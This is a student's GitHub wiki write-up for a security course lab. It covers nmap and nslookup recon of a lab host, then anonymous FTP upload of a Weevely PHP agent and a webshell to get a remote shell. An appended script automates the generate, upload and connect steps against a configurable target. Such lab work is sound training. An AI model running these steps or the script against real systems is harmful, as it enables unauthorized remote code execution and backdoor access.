Lab 8.1 Weevely - Paiet/SEC-335 GitHub Wiki

Somewhat Passive Recon

nslookup pippin.shire.local 10.0.5.22

Active Recon

sudo nmap -f 10.0.5.25 and sudo nmap -sV 10.0.5.25

Found an FTP server open on port 21

Found SSH open on port 22

Found a webserver running and open on port 80

Remote Code Execution

Generated a new agent to be uploaded to the FTP/21 server, using weevely generate 123 502.php (123 being the password and 502.php being the file to be uploaded)

Accessed the FTP server on port 21 with ftp 10.0.5.25 > user anonymous > and no password

Changed into the upload directory and uploaded 501.php (webshell) and 502.php (weevely) using put

I then ran weevely 10.0.5.25/upload/502.php 123, which created/established a shell on pippin
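The generate, upload and connect steps above as one non-interactive script. This is an added example, not the lab's own commands; it assumes the lab's values (host 10.0.5.25, anonymous FTP with an "upload" directory that the web server serves at /upload/, agent 502.php, password 123) and that weevely, ftp and curl are on PATH. The check_served step is the check the procedure skips: confirm the agent is actually reachable over HTTP before running weevely, because a file dropped in an FTP directory outside the web root uploads fine but never executes.

```shell
#!/bin/sh
# Added example (not from the lab page). Lab values below are assumptions;
# override them through the environment for another target.
TARGET="${TARGET:-10.0.5.25}"
FTP_DIR="${FTP_DIR:-upload}"
AGENT="${AGENT:-502.php}"
PASS="${PASS:-123}"

# Print the command script for "ftp -n": -n suppresses auto-login so the
# anonymous user and empty password are sent explicitly (most anonymous FTP
# servers accept any password, so "" is fine), then cd into the upload
# directory and put the agent in binary mode.
ftp_batch() {
    dir="$1"; file="$2"
    printf 'user anonymous ""\n'
    printf 'binary\n'
    printf 'cd %s\n' "$dir"
    printf 'put %s\n' "$file"
    printf 'quit\n'
}

# URL weevely will connect to once the agent sits in the served directory.
agent_url() {
    printf 'http://%s/%s/%s' "$1" "$2" "$3"
}

# weevely generate <password> <path>, then push the file over anonymous FTP.
upload_agent() {
    weevely generate "$PASS" "$AGENT"
    ftp_batch "$FTP_DIR" "$AGENT" | ftp -n "$TARGET"
}

# A 200 means the PHP agent is served (and executes, since a raw PHP listing
# would still be 200 only if the server hands PHP out as text, which the
# following weevely connect would expose). Anything else means the FTP
# directory is not the web root, so weevely would fail to connect.
check_served() {
    code=$(curl -s -o /dev/null -w '%{http_code}' \
        "$(agent_url "$TARGET" "$FTP_DIR" "$AGENT")")
    [ "$code" = "200" ]
}

# Live steps only run with RUN=1 so the helpers can be sourced and inspected
# offline without touching the target.
if [ "${RUN:-0}" = "1" ]; then
    upload_agent
    check_served && weevely "$(agent_url "$TARGET" "$FTP_DIR" "$AGENT")" "$PASS"
fi
```

Run with RUN=1 against the lab host; the script stops before launching weevely if the agent does not answer over HTTP, which is the first thing to check when the connect step hangs or errors.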

Reflections

I feel once I started going, it was pretty straightforward as labs go.